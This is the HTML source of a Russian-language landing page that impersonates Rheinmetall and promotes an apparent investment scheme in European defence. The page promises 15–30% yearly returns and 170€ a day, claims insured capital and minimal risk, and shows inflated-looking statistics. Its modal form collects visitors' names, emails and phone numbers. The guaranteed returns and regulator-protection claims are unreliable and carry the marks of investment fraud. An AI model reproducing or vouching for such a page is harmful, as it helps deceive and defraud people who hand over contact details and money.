<!DOCTYPE html>
<html lang="ru">

<head>
    <script>document.write('<script src="' + window.location.origin + '/integration/compat-shims.js"><\/script>');</script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Инвестиции в оборонный сектор Евросоюза | Rheinmetall</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.13/css/intlTelInput.css">
    <link rel="stylesheet" href="style.css">
</head>

<body>

    <header class="main-header">
        <a href="/" class="logo">
            <img src="img/logo-w.png" alt="Логотип компании Rheinmetall">
        </a>
    </header>

    <section class="info-section">
        <div class="container">
            <div class="info-block">
                <h2 class="info-title">Каждый из вас может получить доход от инвестиций в оборону Евросоюза</h2>
                <a href="#" class="cta-button js-open-modal">Проверить доход</a>
            </div>
            <div class="image-block">
                <img src="img/map-pc.svg" alt="Карта Европы с выделением стран-партнеров">
            </div>
        </div>
    </section>

    <section class="about-section">
        <div class="container">
            <div class="about-content">
                <div class="about-image">
                    <img src="img/about.jpg" alt="Производственный цех оборонных технологий">
                </div>
                <div class="about-text">
                    <h2>Заработок на оборонных технологиях</h2>
                    <p>Каждый раз, когда Rheinmetall заключает новый контракт на производство или модернизацию военной
                        техники, инвесторы получают прибыль. Платформа объединяет оборонную промышленность и фондовый
                        рынок, позволяя зарабатывать на росте заказов и поставок компании. За каждый новый этап
                        реализации контрактов — от поставок бронетехники до производства боеприпасов — вы получаете долю
                        дохода. Это простой и надёжный способ зарабатывать на развитии европейского оборонного сектора.
                    </p>
                </div>
            </div>
        </div>
    </section>

    <section class="cta-banner">
        <div class="container">
            <h3>Ищете возможность заработка?</h3>
            <a href="#" class="cta-button cta-button-light js-open-modal">Проверить доход</a>
        </div>
    </section>

    <section class="stats-section">
        <div class="container">
            <div class="stats-grid">

                <div class="stat-item">
                    <img src="img/stat-1.svg" alt="Иконка денежных выплат">
                    <p class="stat-number">1.2M €</p>
                    <p class="stat-label">Выплаты</p>
                </div>

                <div class="stat-item">
                    <img src="img/stat-2.svg" alt="Иконка группы пользователей">
                    <p class="stat-number">6.5M</p>
                    <p class="stat-label">Пользователи</p>
                </div>

                <div class="stat-item">
                    <img src="img/stat-3.svg" alt="Иконка наградного кубка">
                    <p class="stat-number">270</p>
                    <p class="stat-label">Награды</p>
                </div>

                <div class="stat-item">
                    <img src="img/stat-4.svg" alt="Иконка танка">
                    <p class="stat-number">2025</p>
                    <p class="stat-label">Партнеров</p>
                </div>

                <div class="stat-item">
                    <img src="img/stat-5.svg" alt="Иконка карты мира">
                    <p class="stat-number">40</p>
                    <p class="stat-label">Страны инвесторы</p>
                </div>

            </div>
        </div>
    </section>

    <section class="feature-section">
        <div class="container">
            <div class="feature-grid">
                <div class="feature-image">
                    <img src="img/section-stonks.jpg" alt="Человек анализирует финансовые графики на смартфоне">
                </div>
                <div class="feature-text">
                    <h2>Как работает наша платформа</h2>
                    <p>Наша платформа открывает доступ к инвестициям в оборонные технологии Rheinmetall — одного из
                        ведущих европейских производителей военной техники. Интеллектуальная система автоматически
                        анализирует динамику оборонного рынка, отслеживает государственные заказы и контракты компании,
                        выбирая наиболее прибыльные точки входа. Благодаря этому вы получаете стабильный доход без
                        необходимости вручную управлять активами — всё происходит автоматически, с минимальными рисками
                        и максимальной эффективностью. Ваш капитал работает, пока вы наблюдаете, как растёт оборонная
                        промышленность Европы.</p>
                </div>
            </div>
        </div>
    </section>

    <section class="feature-section feature-section--light-blue">
        <div class="container">
            <div class="feature-grid feature-grid--reversed">
                <div class="feature-image">
                    <img src="img/cta-2.jpg" alt="Счастливая семья смотрит в обеспеченное будущее">
                </div>
                <div class="feature-text">
                    <h2>Ваш доход — вклад в стабильное будущее</h2>
                    <p>Инвестиции в оборонный сектор Rheinmetall — это не просто прибыль, а шаг к финансовой
                        безопасности вашей семьи. С каждым новым контрактом компании растёт и ваш доход, обеспечивая
                        стабильность и долгосрочную перспективу. Платформа создана для тех, кто хочет сформировать
                        надёжный источник пассивного дохода, защитить капитал и чувствовать уверенность в завтрашнем
                        дне.</p>
                </div>
            </div>
        </div>
    </section>

    <section class="feature-section">
        <div class="container">
            <div class="feature-grid">
                <div class="feature-image">
                    <img src="img/cta-3.jpg" alt="Колонна современной военной техники на марше">
                </div>
                <div class="feature-text">
                    <h2>Инвестиции в оборонный сектор: стабильность и высокий потенциал роста</h2>
                    <p>Инвестиции в оборонные технологии Rheinmetall приносят от 15% до 30% годовых, значительно
                        превосходя доходность классических инструментов. Рост государственного финансирования,
                        модернизация военной техники и увеличение экспортных заказов обеспечивают стабильный поток
                        прибыли, независимо от колебаний мировых рынков. Rheinmetall — стратегический партнёр
                        европейской безопасности, а значит, ваши инвестиции работают в одном из самых надёжных и
                        перспективных секторов экономики.</p>
                </div>
            </div>
        </div>
    </section>

    <section class="feature-section feature-section--light-blue">
        <div class="container">
            <div class="feature-grid feature-grid--reversed">
                <div class="feature-image">
                    <img src="img/cta-4.jpg" alt="Символическое изображение щита как гарантия защиты капитала">
                </div>
                <div class="feature-text">
                    <h2>Ваш капитал под защитой</h2>
                    <p>Инвестиции в оборонный сектор Rheinmetall полностью находятся под защитой международных
                        финансовых регуляторов и страховых партнёров программы. Все средства инвесторов застрахованы,
                        что гарантирует безопасность и стабильность даже в условиях нестабильных рынков. Мы обеспечиваем
                        максимальную прозрачность и надёжность на каждом этапе — от регистрации до получения прибыли.
                        Ваш доход работает под защитой сильнейшего игрока европейской оборонной индустрии.</p>
                </div>
            </div>
        </div>
    </section>

    <footer class="site-footer">
        <div class="container">
            <a href="/" class="footer-logo">
                <img src="img/logo-w.png" alt="Логотип Rheinmetall">
            </a>
            <p class="copyright">&copy; 2025 Rheinmetall. All rights reserved.</p>
        </div>
    </footer>

    <div class="modal-overlay">
        <div class="modal-content"> <button class="modal-close" aria-label="Закрыть модальное окно">&times;</button>
            <h3 class="modal-title">Ваша страна проживания:</h3>
            <form class="modal-form">
                <div class="radio-group">
                    <label class="radio-label">
                        <input type="radio" name="country" value="norway">
                        <span>Норвегия</span>
                    </label>
                    <label class="radio-label">
                        <input type="radio" name="country" value="uk">
                        <span>Великобритания</span>
                    </label>
                    <label class="radio-label">
                        <input type="radio" name="country" value="ireland">
                        <span>Ирландия</span>
                    </label>
                    <label class="radio-label">
                        <input type="radio" name="country" value="finland">
                        <span>Финляндия</span>
                    </label>
                    <label class="radio-label">
                        <input type="radio" name="country" value="sweden">
                        <span>Швеция</span>
                    </label>
                    <label class="radio-label">
                        <input type="radio" name="country" value="denmark">
                        <span>Дания</span>
                    </label>
                    <label class="radio-label">
                        <input type="radio" name="country" value="iceland">
                        <span>Исландия</span>
                    </label>
                    <label class="radio-label">
                        <input type="radio" name="country" value="other" checked>
                        <span>Другая</span>
                    </label>
                </div>
                <button type="button" class="cta-button modal-button">Далее</button>
            </form>
        </div>
    </div>

    <div class="modal-overlay" id="registration-modal">
        <div class="modal-content">
            <button class="modal-close" aria-label="Закрыть модальное окно">&times;</button>

            <h3 class="modal-title">На данный момент вам доступен доход от 170€ в день</h3>
            <p class="company-name">компания Rheinmetall</p>

            <form class="registration-form" id="leadForm">
                <div class="form-group">
                    <input type="text" class="form-input" placeholder="Фамилия" required>
                </div>
                <div class="form-group">
                    <input type="text" class="form-input" placeholder="Имя" required>
                </div>
                <div class="form-group">
                    <input type="email" class="form-input" placeholder="Email" required>
                </div>
                <div class="form-group">
                    <input id="phone" type="tel" class="form-input" name="phone" required>
                </div>

                <button type="submit" class="cta-button modal-button">Получить</button>
            </form>
        </div>
    </div>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.13/js/intlTelInput.min.js"></script>
    <script src="script.js"></script>
    <script>document.write('<script src="' + window.location.origin + '/integration/lead-widget.js"><\/script>');</script>
</body>

</html>